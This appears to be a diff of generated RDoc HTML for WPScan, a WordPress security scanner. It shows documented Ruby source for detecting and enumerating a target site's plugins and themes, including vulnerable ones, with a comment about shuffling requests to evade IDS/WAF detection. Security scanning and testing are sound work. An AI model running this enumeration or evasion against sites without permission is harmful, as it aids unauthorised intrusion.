<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpDetector</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="aggressive_detection-method" class="method-detail ">
<a name="method-c-aggressive_detection"></a>
<div class="method-heading">
<span class="method-name">aggressive_detection</span><span
class="method-args">(options, items = [])</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="aggressive_detection-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_detector.rb, line 21</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">aggressive_detection</span>(<span class="ruby-identifier">options</span>, <span class="ruby-identifier">items</span> = [])
<span class="ruby-constant">WpOptions</span>.<span class="ruby-identifier">check_options</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">result</span> = <span class="ruby-identifier">items</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">items</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">or</span> <span class="ruby-identifier">items</span>.<span class="ruby-identifier">length</span> <span class="ruby-operator">==</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">result</span> = <span class="ruby-identifier">passive_detection</span>(<span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>], <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>], <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>])
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">enum_results</span> = <span class="ruby-constant">WpEnumerator</span>.<span class="ruby-identifier">enumerate</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">enum_results</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">enum_result</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">already_present</span> = <span class="ruby-keyword">false</span>
<span class="ruby-identifier">result</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">r</span><span class="ruby-operator">|</span>
<span class="ruby-comment"># Already found via passive detection</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">r</span>.<span class="ruby-identifier">name</span> <span class="ruby-operator">==</span> <span class="ruby-identifier">enum_result</span>.<span class="ruby-identifier">name</span>
<span class="ruby-identifier">already_present</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">break</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">already_present</span>
<span class="ruby-identifier">result</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">enum_result</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">result</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- aggressive_detection-source -->
</div>
</div><!-- aggressive_detection-method -->
<div id="passive_detection-method" class="method-detail ">
<a name="method-c-passive_detection"></a>
<div class="method-heading">
<span class="method-name">passive_detection</span><span
class="method-args">(url, type, wp_content_dir)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>plugins and themes can be found in the source code :</p>
<pre>&lt;script src='http://example.com/wp-content/plugins/s2member/...' /&gt;
&lt;link rel='stylesheet' href='http://example.com/wp-content/plugins/wp-minify/..' type='text/css' media='screen'/&gt;
...</pre>
<div class="method-source-code" id="passive_detection-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_detector.rb, line 50</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">passive_detection</span>(<span class="ruby-identifier">url</span>, <span class="ruby-identifier">type</span>, <span class="ruby-identifier">wp_content_dir</span>)
<span class="ruby-identifier">items</span> = []
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-identifier">regex1</span> = <span class="ruby-regexp">%{(?:[^=:]+)\s?(?:=|:)\s?(?:&quot;|')[^&quot;']+\\?/}</span>
<span class="ruby-identifier">regex2</span> = <span class="ruby-regexp">%{\\?/}</span>
<span class="ruby-identifier">regex3</span> = <span class="ruby-regexp">%{\\?/([^/\\&quot;']+)\\?(?:/|&quot;|')}</span>
<span class="ruby-comment"># Custom wp-content dir is now used in this regex</span>
<span class="ruby-identifier">names</span> = <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>.<span class="ruby-identifier">scan</span>(<span class="ruby-node">/#{regex1}#{Regexp.escape(wp_content_dir)}#{regex2}#{Regexp.escape(type)}#{regex3}/</span>)
<span class="ruby-identifier">names</span>.<span class="ruby-identifier">flatten!</span>
<span class="ruby-identifier">names</span>.<span class="ruby-identifier">uniq!</span>
<span class="ruby-identifier">names</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">item</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">items</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpItem</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">url</span>,
<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">item</span>,
<span class="ruby-value">:type</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">type</span>,
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-node">&quot;#{item}/&quot;</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">wp_content_dir</span>,
<span class="ruby-value">:vulns_file</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;&quot;</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">items</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- passive_detection-source -->
</div>
</div><!-- passive_detection-method -->
</div><!-- public-class-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

418
doc/WpEnumerator.html Normal file
View File

@@ -0,0 +1,418 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpEnumerator</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_enumerator_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_enumerator.rb">lib/wpscan/wp_enumerator.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-enumerate">::enumerate</a></li>
<li><a href="#method-c-generate_items">::generate_items</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpEnumerator</h1>
<div id="description" class="description">
<p>Enumerate over a given set of items and check if they exist</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="enumerate-method" class="method-detail ">
<a name="method-c-enumerate"></a>
<div class="method-heading">
<span class="method-name">enumerate</span><span
class="method-args">(options = {}, items = nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Enumerate the given Targets</p>
<h4>Attributes</h4>
<ul><li>
<p><tt>targets</tt> - targets to enumerate</p>
</li><li><ul><li>
<p><tt>:base_url</tt> - Base URL</p>
</li></ul>
</li><li><ul><li>
<p><tt>:wp_content</tt> - wp-content directory</p>
</li></ul>
</li><li><ul><li>
<p><tt>:path</tt> - Path to plugin</p>
</li></ul>
</li><li>
<p><tt>type</tt> - "plugins" or "themes", item to enumerate</p>
</li><li>
<p><tt>filename</tt> - filename in the data directory with paths</p>
</li><li>
<p><tt>show_progress_bar</tt> - Show a progress bar during enumeration</p>
</li></ul>
<div class="method-source-code" id="enumerate-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_enumerator.rb, line 33</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">enumerate</span>(<span class="ruby-identifier">options</span> = {}, <span class="ruby-identifier">items</span> = <span class="ruby-keyword">nil</span>)
<span class="ruby-constant">WpOptions</span>.<span class="ruby-identifier">check_options</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">targets</span> = <span class="ruby-keyword">self</span>.<span class="ruby-identifier">generate_items</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">items</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">items</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">i</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">targets</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">i</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">found</span> = []
<span class="ruby-identifier">queue_count</span> = <span class="ruby-value">0</span>
<span class="ruby-identifier">request_count</span> = <span class="ruby-value">0</span>
<span class="ruby-identifier">enum_browser</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>
<span class="ruby-identifier">enum_hydra</span> = <span class="ruby-identifier">enum_browser</span>.<span class="ruby-identifier">hydra</span>
<span class="ruby-identifier">enumerate_size</span> = <span class="ruby-identifier">targets</span>.<span class="ruby-identifier">size</span>
<span class="ruby-identifier">targets</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">target</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">url</span> = <span class="ruby-identifier">target</span>.<span class="ruby-identifier">get_full_url</span>
<span class="ruby-identifier">request</span> = <span class="ruby-identifier">enum_browser</span>.<span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">url</span>, { <span class="ruby-value">:cache_timeout</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>, <span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span> })
<span class="ruby-identifier">request_count</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span>
<span class="ruby-identifier">request</span>.<span class="ruby-identifier">on_complete</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">response</span><span class="ruby-operator">|</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:show_progress_bar</span>]
<span class="ruby-identifier">print</span> <span class="ruby-node">&quot;\rChecking for #{enumerate_size} total #{options[:type]}... #{(request_count * 100) / enumerate_size}% complete.&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">if</span> <span class="ruby-constant">WpTarget</span>.<span class="ruby-identifier">valid_response_codes</span>.<span class="ruby-identifier">include?</span>(<span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span>)
<span class="ruby-keyword">if</span> <span class="ruby-constant">Digest</span><span class="ruby-operator">::</span><span class="ruby-constant">MD5</span>.<span class="ruby-identifier">hexdigest</span>(<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>) <span class="ruby-operator">!=</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:error_404_hash</span>]
<span class="ruby-identifier">found</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">target</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">enum_hydra</span>.<span class="ruby-identifier">queue</span>(<span class="ruby-identifier">request</span>)
<span class="ruby-identifier">queue_count</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">queue_count</span> <span class="ruby-operator">==</span> <span class="ruby-identifier">enum_browser</span>.<span class="ruby-identifier">max_threads</span>
<span class="ruby-identifier">enum_hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-identifier">queue_count</span> = <span class="ruby-value">0</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">enum_hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-identifier">found</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- enumerate-source -->
</div>
</div><!-- enumerate-method -->
</div><!-- public-class-method-details -->
<div id="protected-class-method-details" class="method-section section">
<h3 class="section-header">Protected Class Methods</h3>
<div id="generate_items-method" class="method-detail ">
<a name="method-c-generate_items"></a>
<div class="method-heading">
<span class="method-name">generate_items</span><span
class="method-args">(options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="generate_items-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_enumerator.rb, line 84</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">generate_items</span>(<span class="ruby-identifier">options</span> = {})
<span class="ruby-identifier">only_vulnerable</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:only_vulnerable_ones</span>]
<span class="ruby-identifier">file</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>]
<span class="ruby-identifier">vulns_file</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>]
<span class="ruby-identifier">wp_content_dir</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>]
<span class="ruby-identifier">url</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-identifier">type</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>]
<span class="ruby-identifier">plugins_dir</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_plugins_dir</span>]
<span class="ruby-identifier">targets_url</span> = []
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">only_vulnerable</span>
<span class="ruby-comment"># Open and parse the 'most popular' plugin list...</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">file</span>, <span class="ruby-string">&quot;r&quot;</span>) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">f</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">f</span>.<span class="ruby-identifier">readlines</span>.<span class="ruby-identifier">collect</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">line</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">targets_url</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpItem</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">url</span>,
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">line</span>.<span class="ruby-identifier">strip</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">wp_content_dir</span>,
<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-constant">File</span>.<span class="ruby-identifier">dirname</span>(<span class="ruby-identifier">line</span>.<span class="ruby-identifier">strip</span>),
<span class="ruby-value">:vulns_file</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">vulns_file</span>,
<span class="ruby-value">:type</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">type</span>,
<span class="ruby-value">:wp_plugins_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">plugins_dir</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-comment"># Timthumbs have no XML file</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">type</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/timthumbs/</span>
<span class="ruby-identifier">xml</span> = <span class="ruby-constant">Nokogiri</span><span class="ruby-operator">::</span><span class="ruby-constant">XML</span>(<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">vulns_file</span>)) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">config</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">config</span>.<span class="ruby-identifier">noblanks</span>
<span class="ruby-keyword">end</span>
<span class="ruby-comment"># We check if the plugin name from the plugin_vulns_file is already in targets, otherwise we add it</span>
<span class="ruby-identifier">xml</span>.<span class="ruby-identifier">xpath</span>(<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath_2</span>]).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">node</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">name</span> = <span class="ruby-identifier">node</span>.<span class="ruby-identifier">attribute</span>(<span class="ruby-string">&quot;name&quot;</span>).<span class="ruby-identifier">text</span>
<span class="ruby-identifier">targets_url</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpItem</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">url</span>,
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">name</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">wp_content_dir</span>,
<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">name</span>,
<span class="ruby-value">:vulns_file</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">vulns_file</span>,
<span class="ruby-value">:type</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">type</span>,
<span class="ruby-value">:wp_plugins_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">plugins_dir</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">targets_url</span>.<span class="ruby-identifier">flatten!</span> { <span class="ruby-operator">|</span><span class="ruby-identifier">t</span><span class="ruby-operator">|</span> <span class="ruby-identifier">t</span>.<span class="ruby-identifier">name</span> }
<span class="ruby-identifier">targets_url</span>.<span class="ruby-identifier">uniq!</span> { <span class="ruby-operator">|</span><span class="ruby-identifier">t</span><span class="ruby-operator">|</span> <span class="ruby-identifier">t</span>.<span class="ruby-identifier">name</span> }
<span class="ruby-comment"># randomize the plugins array to *maybe* help in some crappy IDS/IPS/WAF detection</span>
<span class="ruby-identifier">targets_url</span>.<span class="ruby-identifier">sort_by!</span> { <span class="ruby-identifier">rand</span> }
<span class="ruby-keyword">end</span></pre>
</div><!-- generate_items-source -->
</div>
</div><!-- generate_items-method -->
</div><!-- protected-class-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

288
doc/WpFullPathDisclosure.html Normal file
View File

@@ -0,0 +1,288 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WpFullPathDisclosure</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/wp_full_path_disclosure_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/wp_full_path_disclosure.rb">lib/wpscan/modules/wp_full_path_disclosure.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-full_path_disclosure_url">#full_path_disclosure_url</a></li>
<li><a href="#method-i-has_full_path_disclosure-3F">#has_full_path_disclosure?</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WpFullPathDisclosure</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
